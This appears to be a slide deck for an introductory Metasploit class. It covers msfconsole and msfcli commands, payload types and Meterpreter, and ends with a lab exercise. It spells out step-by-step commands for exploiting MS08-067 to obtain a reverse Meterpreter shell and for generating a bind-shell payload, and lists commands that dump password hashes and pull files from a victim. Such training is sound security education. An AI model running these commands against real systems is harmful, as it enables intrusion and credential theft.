Metasploit Unleashed Class 1: Metasploit Fundamentals
Georgia Weidman
Director of Cyberwarface, Reverse Space

Acknowledgments
- Metasploit Team
- Offensive Security / Metasploit Unleashed
- Hackers for Charity
- Reverse Space
What is Metasploit
- Exploitation framework
- Ruby based
- Modular: exploits, payloads, auxiliaries, and more

Installing Metasploit
- Use BackTrack
- Windows: installer includes all dependencies
  http://www.metasploit.com/redmine/projects/framework/wiki/install_windows
- Linux: follow the documentation for dependencies
  http://www.metasploit.com/redmine/projects/framework/wiki/install_linux
- Mac: update Ruby and install
  http://www.metasploit.com/redmine/projects/framework/wiki/install_macosx
Terminology
- Exploit: vector for penetrating the system
- Payload: shellcode, what you want the exploit to do
- Encoders: encode or mangle the payload
- Auxiliary: other modules besides exploitation (scanners, fuzzers, etc.)
- Session: connection from a successful exploit

An Example
Traditional pentest:
- Find a public exploit
- Change offsets and return address for your target
- Replace the shellcode
Metasploit:
- Load the Metasploit module
- Select the target OS
- Set IP addresses
- Select a payload

Interacting with Metasploit
- msfconsole
- msfcli
- msfweb, msfgui (discontinued)
- Metasploit Pro, Metasploit Express
- Armitage
Using msfconsole: Commands
- help - shows help
- connect - like netcat
- load/unload/loadpath - load/unload modules
- route - routes subnet traffic through a session
- irb - drops you into a Ruby interpreter
- jobs - show/terminate running jobs

Using msfconsole: Exploitation
- use <module> - sets the exploit/auxiliary/etc. to use
- set <option> <value> - sets a parameter
- setg <option> <value> - sets a parameter globally
- show <x> - lists all available x (exploits, payloads, options, ...)
- exploit - runs the selected module
Exploitation Example
- search windows/smb
- info windows/smb/ms08_067_netapi
- use windows/smb/ms08_067_netapi
- show payloads
- set PAYLOAD windows/meterpreter/reverse_tcp
- show options
- set LHOST 192.168.1.3 (set the other options as well)
- exploit

Using msfcli
./msfcli <exploit> <option=x> X
Example:
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E
- E = exploit
- O = show options
- P = show payloads
Payload Types
- Inline - single payload with the full shellcode
- Staged - stager calls home to get more shellcode
- Meterpreter - advanced, memory-resident payload
- PassiveX - ActiveX based, communicates via HTTP

Payload Types (continued)
- NoNX - designed to circumvent DEP
- Ord - staged payloads that don't require a return address
- IPv6 - built to function over IPv6
- Reflective DLL Injection - staged payload injected into a process in memory (e.g. Meterpreter)

Generating Payloads
- Useful for fixing a public exploit (replacing the shellcode)
- Select a payload (use <payload>)
- generate -b <bad chars> -o <options> -t <output type>
Example:
- use windows/shell/bind_tcp
- generate -o LPORT=4343 -t raw
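The reason the Encoders slide and the -b option exist is that a generated payload may contain bytes the target input path will not pass through (a NUL, a newline). The Ruby below is an added illustration, not code from the slides or from the Metasploit project: it parses a bad-character list in the same "\x00\x0a" form generate -b takes and reports where a raw payload buffer collides with it, using a constructed sample buffer rather than real shellcode.

```ruby
# Added example (not from the slides or Metasploit itself): show what a
# bad-character check does before a payload is dropped into a public exploit.

# Turn a spec such as "\x00\x0a\x0d" as typed on the command line (the
# backslashes are literal characters) into an array of byte values.
def parse_badchars(spec)
  spec.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }.uniq
end

# Return [[offset, byte], ...] for every byte of +payload+ that is in +bad+.
# An empty array means the buffer is clean for that bad-char set.
def find_badchars(payload, bad)
  hits = []
  payload.each_byte.with_index do |b, i|
    hits << [i, b] if bad.include?(b)
  end
  hits
end

# Constructed sample buffer standing in for `generate -t raw` output.
# It is NOT shellcode, just bytes chosen to include NUL and newline.
SAMPLE = "\x90\x90\x00\x41\x0a\x42\x00".b

if __FILE__ == $0
  bad  = parse_badchars('\x00\x0a\x0d')
  hits = find_badchars(SAMPLE, bad)
  if hits.empty?
    puts 'payload is clean for the given bad chars'
  else
    hits.each { |off, b| printf("bad char 0x%02x at offset %d\n", b, off) }
    puts 'an encoder (generate -b) or a different payload is needed'
  end
end
```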
Meterpreter
- Gain a session using a Meterpreter payload
- Memory based / never hits the disk
- Everything a shell can do, plus extra

Meterpreter: Commands
- help - shows all available commands
- background - backgrounds the session
- ps - shows all processes
- migrate <process id> - moves Meterpreter to another process
- getuid - shows the current user

Meterpreter: Commands (continued)
- download <file> - pulls a file from the victim
- upload <file on attacker> <file on victim> - pushes a file to the victim
- hashdump - dumps the password hashes from the SAM
- shell - drops you into a shell
Exercises
- In msfconsole, use ms08_067_netapi to get a reverse Meterpreter shell on your Windows XP machine.
- Experiment with different payloads and Meterpreter commands.